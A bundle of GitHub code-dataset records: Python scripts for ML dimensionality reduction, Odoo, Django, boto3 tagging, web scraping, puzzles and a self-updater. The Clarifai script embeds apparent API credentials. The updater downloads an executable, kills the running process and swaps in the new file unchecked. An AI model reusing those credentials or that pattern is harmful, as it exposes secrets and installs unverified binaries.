mds.fit_transform(test_data)\n\n\treturn test_data\n\ndef TSNE_(test_data):\n\n\ttsne = TSNE(n_components=2)\n\ttest_data = tsne.fit_transform(test_data)\n\n\treturn test_data\n\ndef main():\n\n\targs = parser.parse_args()\n\n\t#get testing data\n\ttest_data_ = torchvision.datasets.FashionMNIST(root='./fashion_mnist_data', train=False, download=True, transform=transforms.ToTensor())\n\n\t#flatten the testing data\n\ttest_data = test_data_.data.numpy()\n\ttest_data = test_data.astype(float)/255.0\n\ttest_data = test_data.reshape(test_data.shape[0], 784)\n\n\t#get testing labels\n\ttest_label = test_data_.targets.numpy()\n\ttest_label = test_label.reshape(10000, 1)\n\n\t#apply dimensionality reduction\n\tif args.method == 'pca':\n\t\ttest_data = PCA_(test_data)\n\telif args.method == 'mds':\n\t\ttest_data = MDS_(test_data)\n\telif args.method == 'tsne':\n\t\ttest_data = TSNE_(test_data)\n\n\tresult = np.concatenate((test_data, test_label), axis=1)\n\tnp.savetxt(args.method + \".csv\", result, header=\"x,y,target\", comments='', delimiter=',', fmt=['%.5f', '%.5f', '%d'])\n\nif __name__ == \"__main__\":\n\tmain()","repo_name":"yyou22/D3-Dimensionality-Reduction","sub_path":"mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36034872994","text":"__metaclass__ = type\n__all__ = [\n 'BugsBrowserRequest',\n 'BugsLayer',\n 'bugs_request_publication_factory',\n 'LaunchpadBugContainer',\n ]\n\n\nfrom zope.interface import implements\nfrom zope.publisher.interfaces.browser import (\n IBrowserRequest,\n IDefaultBrowserLayer,\n )\n\nfrom lp.services.webapp.interfaces import ILaunchpadContainer\nfrom lp.services.webapp.publication import LaunchpadBrowserPublication\nfrom lp.services.webapp.publisher import LaunchpadContainer\nfrom lp.services.webapp.servers import (\n LaunchpadBrowserRequest,\n VHostWebServiceRequestPublicationFactory,\n )\n\n\nclass BugsLayer(IBrowserRequest, IDefaultBrowserLayer):\n \"\"\"The Bugs layer.\"\"\"\n\n\nclass BugsBrowserRequest(LaunchpadBrowserRequest):\n \"\"\"Instances of BugBrowserRequest provide `BugsLayer`.\"\"\"\n implements(BugsLayer)\n\n\ndef bugs_request_publication_factory():\n return VHostWebServiceRequestPublicationFactory(\n 'bugs', BugsBrowserRequest, LaunchpadBrowserPublication)\n\n\nclass LaunchpadBugContainer(LaunchpadContainer):\n\n def isWithin(self, scope):\n \"\"\"Is this bug within the given scope?\n\n A bug is in the scope of any of its bugtasks' targets.\n \"\"\"\n for bugtask in self.context.bugtasks:\n if ILaunchpadContainer(bugtask.target).isWithin(scope):\n return True\n return False\n","repo_name":"abramhindle/UnnaturalCodeFork","sub_path":"python/testdata/launchpad/lib/lp/bugs/publisher.py","file_name":"publisher.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44662450948","text":"# Создайте новую Базу данных. Поля: id, 2 целочисленных поля. 
Целочисленные поля заполняются рандомно от 0 до 9.\n# Посчитайте среднее арифметическое всех элементов без учёта id.\n# Если среднее арифметическое больше количества записей в БД, то удалите четвёртую запись БД\n#\nimport sqlite3\nimport random # для заполнения данных рандомно\n\nconn = sqlite3.connect('dz.db')\ncursor = conn.cursor()\n\ncursor.execute('''CREATE TABLE IF NOT EXISTS tab_1(id INTEGER PRIMARY KEY AUTOINCREMENT, col_1 INT, col_2 INT)''')\n\nfor i in range(5):\n a = random.randint(0, 9)\n b = random.randint(0, 9)\n cursor.execute('''INSERT INTO tab_1(col_1, col_2) VALUES (?, ?)''', (a, b)) # для заполнения данных\n# conn.commit() # для запоминания данных в базе\ncursor.execute('''SELECT col_1, col_2 FROM tab_1''') # вызываем данные без id для подсчета среднего значения\nk = cursor.fetchall() # вызываем атрибут\nprint(k, len(k))\n\naver = []\nfor i in k:\n aver.append((sum(i) / len(i))) # добавляем средние значения по каждому кортежу в список\n if (sum(aver) / len(aver)) > len(k): # среднее арифметическое всех элементов в базе данных\n cursor.execute('''DELETE FROM tab_1 WHERE id=4''') # удаляем четвертую запись по условию задачи\n cursor.execute('''SELECT * FROM tab_1''') # вызываем данные с id, для выполнения условия удаления\n k = cursor.fetchall() # вызываем атрибут\n\nprint(aver) # список средних значений кортежей\nprint('average values', sum(aver) / len(aver)) # среднее значение, для понимания выполнения задачи\nprint(k, len(k)) # если сработает условие, длинна будет меньше на одну запись id 4\n","repo_name":"VitasNV/Git_lesson","sub_path":"SQL.py","file_name":"SQL.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74272441475","text":"def binarioparainteiro(binario):\n contador = 0\n global inteiro\n inteiro = 0 \n \n while(binario != 0):\n a = binario % 10\n inteiro = inteiro + a *pow(2, contador)\n binario = binario // 10\n contador += 1 \n return inteiro\n \nbinario = 0\nx = 0\ninteiroFinal = 0\ncontador = 1\na = 0\nb = 0\nc = 0\n\nwhile x != \"saida\":\n x = input()\n SubZero = x.replace(\"-\",\"0\")\n SubUm = SubZero.replace(\"*\",\"1\")\n x = SubUm\n if x != \"caw caw\":\n binarioparainteiro(int(x))\n inteiroFinal += inteiro\n elif x == \"caw caw\":\n if contador == 1:\n a = inteiroFinal\n inteiroFinal = 0\n contador += 1\n elif contador == 2:\n b = inteiroFinal\n inteiroFinal = 0\n contador += 1\n elif contador == 3:\n c = inteiroFinal\n x = \"saida\"\nprint (a)\nprint (b)\nprint (c)","repo_name":"andersonaoliveira/Exercicios-em-Python---beecrowd","sub_path":"1848 - Corvo Contador/1848 - Corvo Contador.py","file_name":"1848 - Corvo Contador.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35499950486","text":"from clarifai.rest import ClarifaiApp\nfrom clarifai.rest import Image as ClImage\nimport os\nimport time\nfrom django.conf import settings\n\ningredientTypes = {\n 'Henny': 'Cogniac',\n 'Goose': 'Vodka',\n 'Lime': 'Garnish',\n 'Ciroc': 'Vodka',\n 'Jameson': 'Whiskey',\n 'DryVermouth': 'Dry Vermouth',\n 'AngosturaBitters': 'Angostura Bitters'\n\n}\n\n\n\n\n\ndef run(image):\n app = ClarifaiApp(\"KiPgquABTE-kvueyDk2GoUrAlbJWGwCXlfrQ45pN\", \"hkAMvUIGzHH8hZNpPy1fyeC4sca2iS9SgTAUnwLe\")\n\n\n # get the general model\n\n model = app.models.get(\"alcohol\")\n image = ClImage(file_obj=image)\n pred = model.predict([image])\n pred = 
pred['outputs'][0]['data']['concepts'][0]\n pred['description'] = ingredientTypes[pred['name']]\n # print pred\n return pred\n\n\n\n\n","repo_name":"nigel-hall-codes/LiquorCabinet","sub_path":"cocktails/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24497984921","text":"import requests, re,os,shutil\n\n\ndef get_ver():\n html = requests.get(\"https://github.com/qwerttqq95/698SP_CL/blob/master/ver\").content\n q = re.compile(r'ver=\\d{6}')\n qw = q.findall(str(html))\n if qw is None:\n return None\n ver = qw[0][4:]\n print(\"The new is \" + ver)\n return ver\n\n\ndef loal_ver():\n f = open(\".\\\\attach\\\\ver\", 'r')\n text = f.read()\n q = re.compile(r'\\d{6}')\n ver = q.findall(text)\n if ver is None:\n return None\n return ver.pop()\n\n\ndef update(new_ver):\n try:\n r = requests.get(\"https://github.com/qwerttqq95/698SP_CL/raw/master/cmake-build-release/698SP_CL.exe\")\n with open(\".\\\\attach\\\\698SP_CL.exe\", \"wb\") as f:\n f.write(r.content)\n l = open(\".\\\\attach\\\\ver\", 'w')\n l.write(\"ver=\"+str(new_ver))\n print(\"下载完成...\")\n return True\n except:\n print(\"网络遇到问题\")\n return False\n\n\ndef delete():\n print(\"移除旧版...\")\n try:\n os.system('taskkill /f /im %s' % '698SP_CL.exe')\n os.remove(\"698SP_CL.exe\")\n finally:\n shutil.move(\".\\\\attach\\\\698SP_CL.exe\", \"./\")\n print(\"Update ok\")\n\n\ndef main():\n new_ver = get_ver()\n local_ver = loal_ver()\n if new_ver is None or local_ver is None:\n print(\"升级检测失败\")\n if new_ver == local_ver:\n print(\"无新版\")\n elif int(new_ver) > int(local_ver):\n print(\"发现新版,开始升级...\")\n if update(new_ver) is False:\n print(\"升级检测失败\")\n return\n delete()\n else:\n print(\"????\")\n\n\nif __name__ == '__main__':\n main()\n os.system(\"pause\")\n","repo_name":"qwerttqq95/698sp_cl_update_tool","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14296956159","text":"\"\"\"\n241. 
Different Ways to Add Parentheses\nhttps://leetcode.com/problems/different-ways-to-add-parentheses/\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def diffWaysToCompute(self, s, memo={}) -> List[int]:\n # NB: the mutable default 'memo' is intentional - it persists across calls as a shared cache\n # DFS Backtrack\n # [0] Initialize a helper to calculate operation between 2 arguments\n # [1] if s is digit return [int(s)]\n # [2] if s is in a memoization (cache) then return cache\n # [3] for i in range(len(s)) if s[i] is an operation then split string s at i and run self.diffWaysToCompute on s[:i] and s[i+1:] and store as res1, res2 resp\n # [4] for j,k in res1, res2 append to result helper(j,k, s[i]).\n # Complexity n = len(s)\n # Bijection with balanced parentheses\n # Time: O(n*2^n) (or Catalan numbers) because at each number can open/close a parentheses\n # and splitting the string takes n time.\n # Space: O(2^n) worst to store results (catalan numbers)\n if s.isdigit():\n return [int(s)]\n if s in memo:\n return memo[s]\n res = []\n for i in range(len(s)):\n if s[i] in \"-+*\":\n res1 = self.diffWaysToCompute(s[:i])\n res2 = self.diffWaysToCompute(s[i+1:])\n for j in res1:\n for k in res2:\n res.append(self.helper(j, k, s[i]))\n memo[s] = res\n return res\n\n def helper(self, m, n, op):\n if op == \"+\":\n return m+n\n elif op == \"-\":\n return m-n\n else:\n return m*n\n","repo_name":"mathvolcano/leetcode","sub_path":"0241_diffWaysToCompute.py","file_name":"0241_diffWaysToCompute.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"41894370936","text":"from odoo import _, api, exceptions, fields, models\n\n\nclass WizardCurrencyRevaluation(models.TransientModel):\n _name = \"wizard.reverse.currency.revaluation\"\n _description = \"Reverse Currency Revaluation Wizard\"\n\n @api.model\n def _get_default_journal_id(self):\n return self.env.company.currency_reval_journal_id\n\n revaluation_interval_start_date = fields.Date(\n string=\"Revaluation Start Date\",\n help=\"All entries revaluated on or after this date will be taken into account.\",\n )\n revaluation_interval_end_date = fields.Date(\n string=\"Revaluation End Date\",\n help=\"All entries revaluated on or before this date will be taken into account.\",\n )\n\n reverse_posting_date = fields.Date(\n string=\"Reverse Entries Accounting Date\",\n help=\"Date that will be assigned to the reverse entries created.\",\n )\n\n journal_id = fields.Many2one(\n comodel_name=\"account.journal\",\n string=\"Journal\",\n domain=[(\"type\", \"=\", \"general\")],\n help=\"You can set the default journal in company settings.\",\n required=True,\n default=lambda self: self._get_default_journal_id(),\n )\n\n entries_to_reverse_ids = fields.Many2many(\n comodel_name=\"account.move\",\n string=\"Entries to reverse\",\n help=\"The revaluated entries that will be reversed.\",\n )\n\n @api.onchange(\"revaluation_interval_start_date\", \"revaluation_interval_end_date\")\n def onchange_revaluation_interval_dates(self):\n self.ensure_one()\n account_move_model = self.env[\"account.move\"]\n company_id = self.journal_id.company_id.id or self.env.company.id\n domain = [\n (\"revaluation_to_reverse\", \"=\", True),\n (\"state\", \"=\", \"posted\"),\n (\"company_id\", \"=\", company_id),\n ]\n if self.revaluation_interval_start_date:\n domain += [(\"date\", \">=\", self.revaluation_interval_start_date)]\n if self.revaluation_interval_end_date:\n domain += [(\"date\", \"<=\", self.revaluation_interval_end_date)]\n entries = account_move_model.search(domain)\n final_entries = 
account_move_model\n for entry in entries:\n reverse_entry = account_move_model.search(\n [(\"reversed_entry_id\", \"=\", entry.id)], limit=1\n )\n if not reverse_entry:\n final_entries += entry\n self.entries_to_reverse_ids = final_entries\n\n def reverse_revaluate_currency(self):\n entries = self.entries_to_reverse_ids\n created_entries = entries._reverse_moves()\n vals = {\"revaluation_reversed\": True, \"revaluation_to_reverse\": False}\n if self.reverse_posting_date:\n vals.update({\"date\": self.reverse_posting_date})\n created_entries.write(vals)\n if self.journal_id.company_id.auto_post_entries:\n for entry in created_entries:\n entry.post()\n # Mark entries reversed as not to be reversed anymore\n entries.write({\"revaluation_to_reverse\": False})\n if created_entries:\n return {\n \"domain\": [(\"id\", \"in\", created_entries.ids)],\n \"name\": _(\"Reverse Revaluation Entries\"),\n \"view_mode\": \"tree,form\",\n \"auto_search\": True,\n \"res_model\": \"account.move\",\n \"view_id\": False,\n \"search_view_id\": False,\n \"type\": \"ir.actions.act_window\",\n }\n else:\n raise exceptions.Warning(_(\"No accounting entry has been posted.\"))\n","repo_name":"OCA/account-closing","sub_path":"account_multicurrency_revaluation/wizard/wizard_reverse_currency_revaluation.py","file_name":"wizard_reverse_currency_revaluation.py","file_ext":"py","file_size_in_byte":3580,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"61"} +{"seq_id":"23587051451","text":"from decimal import *\ngetcontext().prec = 10\nfrom math import pi\nfrom itertools import combinations\n\ndef ints(l):\n\treturn tuple([int(i) for i in l])\n\nT = int(input())\nfor test in range(T):\n\tn, k = ints(input().split())\n\tdim = [0] * n\n\tfor i in range(n):\n\t\tdim[i] = ints(input().split())\n\t#print(dim)\n\tdim = sorted(dim)[::-1]\n\t\n\tb = 0\n\tfor p2 in combinations({i for i in range(n)}, k):\n\t\tp = sorted(p2)\n\t\ts = dim[p[0]][0] * dim[p[0]][0]\n\t\tfor i in p:\n\t\t\ts += 2 * dim[i][0] * dim[i][1]\n\t\tif s > b:\n\t\t\tb = s\n\n\tprint(\"Case #\" + str(test+1) + \": \" + str(pi*b) )\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_209/730.py","file_name":"730.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43084262850","text":"import os, sys, re\nfrom PoP_level_parser import PoPISPTopo\npyPath = os.path.dirname(os.path.abspath(__file__))\nallFolders = os.listdir(pyPath)\nlinkFolders = [e for e in allFolders if re.match('[1-9]{1,}_[1-9]{1,}', e)]\n\nASes = []\nASlinks = []\nfor e in linkFolders:\n ASNum = e.split('_')\n if(int(ASNum[0]) == int(ASNum[1])):\n ASes.append(int(ASNum[0]))\n else:\n ASlinks.append((int(ASNum[0]), int(ASNum[1])))\nASes.sort()\nf = open('AS', 'w')\nfor a in ASes:\n f.write(str(a)+'\\n')\nf.close()\n# take only AS links between ASes that we have complete topology information\nASlinks = [l for l in ASlinks if l[0] in ASes and l[1] in ASes]\nASlinks.sort()\n\n\nnodesIdDict = {}\nf = open(\"nodes\")\nfor l in f:\n temp = l.split('|', 1)\n temp[1] = temp[1].strip('\\n')\n nodesIdDict[temp[1].replace('|',':')] = int(temp[0])\nf.close()\n\nWiserASlinks = []\nf = open('ingress_egress', 'w')\nlf = open('AS_links', 'w')\nplf = open('peering_links', 'w')\nfor a in ASes:\n peeringASes = [e[1] for e in ASlinks if e[0] == a]\n topo = PoPISPTopo(a)\n borderNodes = [n[\"name\"] for n in topo.g.vs.select(ASNum=a, 
border=True)]\n for p in peeringASes:\n # All the nodes that connected to p are considered as ingress nodes.\n peeringNodes = topo.g.vs.select(ASNum=p)\n ingress = []\n for n in peeringNodes:\n peeringlinkIdx = topo.g.incident(n.index)\n for l in peeringlinkIdx:\n if topo.g.es[l].source == n.index:\n if topo.g.vs[topo.g.es[l].target][\"name\"] not in ingress:\n ingress.append(topo.g.vs[topo.g.es[l].target][\"name\"]) \n plf.write(str(a)+','+str(p)+','+str(nodesIdDict[topo.g.vs[topo.g.es[l].target][\"name\"]])+','+str(nodesIdDict[topo.g.vs[topo.g.es[l].source][\"name\"]])+'\\n')\n else:\n if topo.g.vs[topo.g.es[l].source][\"name\"] not in ingress:\n ingress.append(topo.g.vs[topo.g.es[l].source][\"name\"])\n plf.write(str(a)+','+str(p)+','+str(nodesIdDict[topo.g.vs[topo.g.es[l].source][\"name\"]])+','+str(nodesIdDict[topo.g.vs[topo.g.es[l].target][\"name\"]])+'\\n')\n ingress = [nodesIdDict[n] for n in ingress]\n ingress.sort()\n '''\n # All the border nodes that connected to peering ASes except for p are considered as egress nodes.\n borderNodes = topo.g.vs.select(ASNum_notin=[a, p])\n egress = []\n for n in borderNodes:\n peeringlinkIdx = topo.g.incident(n.index)\n for l in peeringlinkIdx:\n if topo.g.es[l].source == n.index:\n if topo.g.vs[topo.g.es[l].target][\"name\"] not in egress:\n egress.append(topo.g.vs[topo.g.es[l].target][\"name\"]) \n else:\n if topo.g.vs[topo.g.es[l].source][\"name\"] not in egress:\n egress.append(topo.g.vs[topo.g.es[l].source][\"name\"])\n '''\n egress = [nodesIdDict[n] for n in borderNodes if nodesIdDict[n] not in ingress]\n egress.sort()\n if len(ingress) > 1 and len(egress) > 0:\n f.write(str(a)+'|'+str(p)+'|'+str(ingress).replace('[','{').replace(']','}')+'|'+str(egress).replace('[','{').replace(']','}')+'\\n')\n lf.write(str(a)+','+str(p)+'\\n')\n WiserASlinks.append((a,p))\nf.close()\nlf.close()\nplf.close()","repo_name":"wadaries/Rocketfule-ISP-Topology","sub_path":"PoP-level ISP maps/maps-n-paths/ingress_egress.py","file_name":"ingress_egress.py","file_ext":"py","file_size_in_byte":3374,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"35907138343","text":"import os\nimport sys\nfrom pathlib import Path\nfrom sys import platform\nimport subprocess\n\npath = Path(__file__).parent.absolute()\npath_dataset = os.path.join(path, \"datasets\")\npath = os.path.join(path, \"lib\")\nsys.path.append(path)\n\nfrom imports import *\n\n\n\"\"\"\nThis class calculates feature importance\n\nInput: \n\n\n\"\"\"\n\n\nclass explainx_pro():\n def __init__(self):\n super(explainx_pro, self).__init__()\n self.param = {}\n\n # is classification function?\n\n\n def rule_exploration(self, df, y, model):\n from apps.webapp.server.server import run\n y_pred = model.predict(df)\n target_names = list(set(y_pred))\n target_names = list(map(int, target_names))\n X = df.drop(columns=['y'], errors='ignore').values\n min_val = np.min(X, axis=0)\n max_val = np.max(X, axis=0)\n self.rule_output_data(cols=df.drop(columns=['y'], errors='ignore').columns.values.tolist(),\n data=X.tolist(),\n target_names=target_names,\n real_min=min_val.tolist(),\n real_max=max_val.tolist(),\n y_pred=y_pred.tolist(),\n y_gt=y)\n # print(os.system('python apps.webapp.server.py'))\n run()\n\n def get_random_string(self, length):\n letters = string.ascii_lowercase + string.ascii_uppercase\n result_str = ''.join(random.choice(letters) for i in range(length))\n return result_str\n\n def rule_output_data(self, cols, data, target_names, real_min, 
real_max, y_pred, y_gt):\n # data_name = self.get_random_string(5)\n filename = \"{}/apps/prepare/output/\".format(path) + \"user_defined\" + \"/test.json\"\n filename2 = \"{}/apps/webapp/data/\".format(path) + \"user_defined\" + \"/test.json\"\n\n directory = os.path.dirname(filename)\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n to_output = {}\n to_output['columns'] = cols\n to_output['data'] = data\n to_output['target_names'] = target_names\n to_output['real_min'] = real_min\n to_output['real_max'] = real_max\n to_output['y_pred'] = y_pred\n to_output['y_gt'] = y_gt\n with open(filename, 'w') as output:\n output.write(json.dumps(to_output))\n with open(filename2, 'w') as output:\n output.write(json.dumps(to_output))\n\n def dataset_boston(self):\n # load JS visualization code to notebook\n shap.initjs()\n X, y = shap.datasets.boston()\n return X, y\n\n def dataset_iris(self):\n # load JS visualization code to notebook\n shap.initjs()\n X, y = shap.datasets.iris()\n return X, y\n\n def dataset_heloc(self):\n dataset = pd.read_csv(path_dataset + \"/heloc_dataset.csv\")\n\n map_riskperformance = {\"RiskPerformance\": {\"Good\": 1, \"Bad\": 0}}\n dataset.replace(map_riskperformance, inplace=True)\n y = list(dataset[\"RiskPerformance\"])\n X = dataset.drop(\"RiskPerformance\", axis=1)\n return X, y\n\nexplainx_pro = explainx_pro()\n\n\n","repo_name":"explainX/Surrogate-Rule-Exploration-Method","sub_path":"explainx_pro.py","file_name":"explainx_pro.py","file_ext":"py","file_size_in_byte":3136,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"38073309265","text":"import sys\nin_put = sys.stdin.readline\n\n\na=int(in_put())\nc= [[0,0,0]]*a\n\nfor i in range(a):\n b,d =in_put().split()\n b= int(b)\n d= d.rstrip(\"\\n\")\n c[i]=b,i,d\n\nc.sort()\n\n\n\n\nfor j in range(a):\n print(c[j][0], c[j][2])\n","repo_name":"machi107/Baekjoon-Codes","sub_path":"Silver 5/10814 나이순 정렬.py","file_name":"10814 나이순 정렬.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24735724428","text":"\n# coding: utf-8\n\n# In[51]:\n\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n#sample website\nr=requests.get(\"https://pythonhow.com/real-estate/rock-springs-wy/LCWYROCKSPRINGS/\")\nc=r.content\n\n#reads though the website and looks for the important content we are looking for\nsoup = BeautifulSoup(c,\"html.parser\")\n\nall = soup.find_all(\"div\", {\"class\":\"propertyRow\"})\n\nall[0].find(\"h4\",{\"class\":\"propPrice\"}).text.replace(\"\\n\",\"\")\n\npage_nr=soup.find_all(\"a\",{\"class\":\"Page\"})[-1].text\nprint(page_nr)\n\n\n# In[52]:\n\n#script loops through every page of the sample website\n#reads though all of the property data and grabs the useful info we want\n#and adds it to an empty dictionary\n#address,locality, price, beds, baths and Area\n#and adds dictionary info into an empty list item to more easily create a dataframe object\nl=[]\nbase_url=\"https://www.pythonhow.com/real-estate/rock-springs-wy/LCWYROCKSPRINGS/t=0&s=\"\nfor page in range(0,int(page_nr)*10,10):\n print(base_url+str(page)+\".html\")\n r=requests.get(base_url+str(page)+\".html\")\n c=r.content\n soup=BeautifulSoup(c,\"html.parser\")\n print(soup.prettify())\n all = soup.find_all(\"div\", {\"class\":\"propertyRow\"})\n\n for item in all:\n d={}\n d[\"Address\"]=item.find_all(\"span\",{\"class\", \"propAddressCollapse\"})[0].text\n try:\n 
d[\"Locality\"]=item.find_all(\"span\",{\"class\", \"propAddressCollapse\"})[1].text\n except:\n d[\"locality\"]=None\n d[\"Price\"]=item.find(\"h4\",{\"class\",\"propPrice\"}).text.replace(\"\\n\",\"\").replace(\" \",\"\")\n try:\n d[\"Beds\"]=item.find(\"span\",{\"class\",\"infoBed\"}).find(\"b\").text\n except:\n d[\"Beds\"]=None\n\n try:\n d[\"Area\"]=item.find(\"span\",{\"class\",\"infoSqFt\"}).find(\"b\").text\n except:\n d[\"Area\"]=None\n try:\n d[\"Full Baths\"]=item.find(\"span\",{\"class\",\"infoValueFullBath\"}).find(\"b\").text\n except:\n d[\"Full Baths\"]=None\n try:\n d[\"Half Baths\"]=item.find(\"span\",{\"class\",\"infoValueHalfBath\"}).find(\"b\").text\n except:\n d[\"Half Baths\"]=None\n #try:\n #print(item.find(\"div\",{\"class\",\"propertyMLS\"}).text)\n #except:\n #print(None)\n for column_group in item.find_all(\"div\",{\"class\":\"columnGroup\"}):\n for feature_group, feature_name in zip(column_group.find_all(\"span\",{\"class\":\"featureGroup\"}), column_group.find_all(\"span\",{\"class\":\"featureName\"})):\n if \"Lot Size\" in feature_group.text:\n d[\"Lot Size\"]=feature_name.text\n l.append(d)\n\n\n# In[31]:\n\n\nl\n\n\n# In[53]:\n\n#uses pandas to create a dataframe object\nimport pandas\ndf=pandas.DataFrame(l)\n\n\n# In[46]:\n\n\ndf\n\n\n# In[54]:\n\n#creates a csv file from the dataframe\ndf.to_csv(\"Output.csv\")\n","repo_name":"peter-izzo/Web-Scraping","sub_path":"Century21.py","file_name":"Century21.py","file_ext":"py","file_size_in_byte":2914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72568030274","text":"# - Write a boto3 script that prints out all VPCs and Subnets\n# in your lab account.\n# - Then for each resource found (VPC and subnets), \n# attach a new AWS tag \"Project: Talent-Academy\" \n# where tag key is \"Project\" and tag value is \"Talent-Academy\"\n\nimport boto3\nclient =boto3.client('ec2',region_name='eu-central-1')\nvpcs = client.describe_vpcs()\nprint(vpcs)\nsubnets = client.describe_subnets()\nprint(subnets)\n\nfor vpc in vpcs['Vpcs']:\n vpc_id = vpc.get('VpcId',[])\n client.create_tags(\n Resources = [vpc_id],\n Tags = [\n {\n 'Key':'Project',\n 'Value':'Talent-Academy'\n },\n ]\n )\n\nfor subnet in subnets['Subnets']:\n subnet_id = vpc.get('SubnetId',[])\n client.create_tags(\n Resources = [subnet_id],\n Tags = [\n {\n 'Key':'Project',\n 'Value':'Talent-Academy'\n },\n ]\n )\n","repo_name":"KlToti/boto3","sub_path":"list_vpcs.py","file_name":"list_vpcs.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33444427274","text":"from django.contrib import admin\nfrom django.urls import path, include \nfrom listings.views import listing_list, listing_retrieve, listing_create, listing_update, listing_delete, listing_rent_list, listing_rent\nfrom .views import home_view \nfrom users.views import register, login_user, logout_user \n\nfrom django.conf import settings \nfrom django.conf.urls.static import static \n\n\nurlpatterns = [\n path('admin/logout/', logout_user),\n path('admin/', admin.site.urls),\n\n path('register/',register), \n path('login/',login_user),\n path('logout/', logout_user), \n\n\n path(\"home/\", home_view), \n path('listings/all/', listing_list),\n path('listings/single//',listing_retrieve ),\n path('listings/create/', listing_create), \n path('listings/single//update/', listing_update),\n path('listings/single//delete/', listing_delete), \n 
path('rent/all/', listing_rent_list), \n path('rent/single//', listing_rent), \n\n path('user/', include('users.urls')),\n path('staff/', include('staff.urls')) \n]\n\nurlpatterns += static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT) \n\n\n ","repo_name":"AibekMinbaev/great-estate","sub_path":"real_estate/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71766032515","text":"\"\"\"\n This is a template to create Class base\n Provides the stub code for a task\n\n\"\"\"\n\n__author__ = \"Matt Lorentzen @lorentzenman\"\n__license__ = \"MIT\"\n\n\nimport os\nimport sys\nimport textwrap\n\n\nclass CreateTemplate(object):\n \"\"\"\n Creates a template object with stub code\n \"\"\"\n\n def __init__(self, name):\n \"\"\"\n Takes the name from argparse and builds out a template for this\n \"\"\"\n self.name = name\n self.indent_space = ' '\n\n output_file_name = name + \".py\"\n with open(output_file_name, \"w\") as template_file:\n template_file.write(\n self.template_create_notes_header() +\n self.template_notes() +\n self.template_author_details() +\n self.template_modules() +\n self.template_class_cmd_declaration() +\n self.template_class_cmd_internals() +\n self.template_common_cmd_functions_new() +\n self.template_common_cmd_functions_cmd() +\n self.template_common_cmd_functions_complete() +\n self.template_helper_function_comment() +\n self.template_task_class_definition() +\n self.template_task_class_static_method_definition() +\n self.template_class_autoIT_block_definition() +\n self.template_class_autoIT_block_open() +\n self.template_class_autoIT_block_typing() +\n self.template_class_autoIT_block_close() +\n self.template_class_autoIT_create()\n )\n\n\n def template_create_notes_header(self):\n \"\"\"\n Formatter for notes file at the top of the task\n \"\"\"\n notes_header = \"\"\"\n \n # #######################################################################\n #\n # Task : {} Interaction\n #\n # #######################################################################\n \n \"\"\".format(self.name)\n\n return textwrap.dedent(notes_header)\n\n\n def template_notes(self):\n \"\"\"\n Builds out the notes at the top of the file\n \"\"\"\n \n class_notes = \"\"\"\n \\\"\"\"\n Creates the autoIT stub code to be passed into the master compile\n\n Takes a supplied text file for the Sheepl to type\n the master script will already define the typing speed as part of the master declarations\n\n ##############################################\n Add in Task Specific Notes Here\n ##############################################\n\n General Notes:\n The textwrap import is used to keep the AutoIT functions indented in code\n as this messes with the python code (back off OCD) when it's manually \n appearing to hang outside of the class declarations and also stops code collapse in IDEs.\n So when creating code specific to the AutoIT functions just use tabs to indent insitu\n and the textwarp library will strip all leading tabs from the beginning of the AutoIT block.\n Also uses textwrap.indent() to add indentation to 'Send' commands in text_typing_block()\n\n Conventions:\n Use 'AutoIT' in code comments and class names and 'autoIT' when using as part of variable names\n\n Modes:\n Interactive Mode\n This uses the task module assign task requirements\n Add additional CMD functions using do_\n Once all the arguments are complete\n build the do_complete function out 
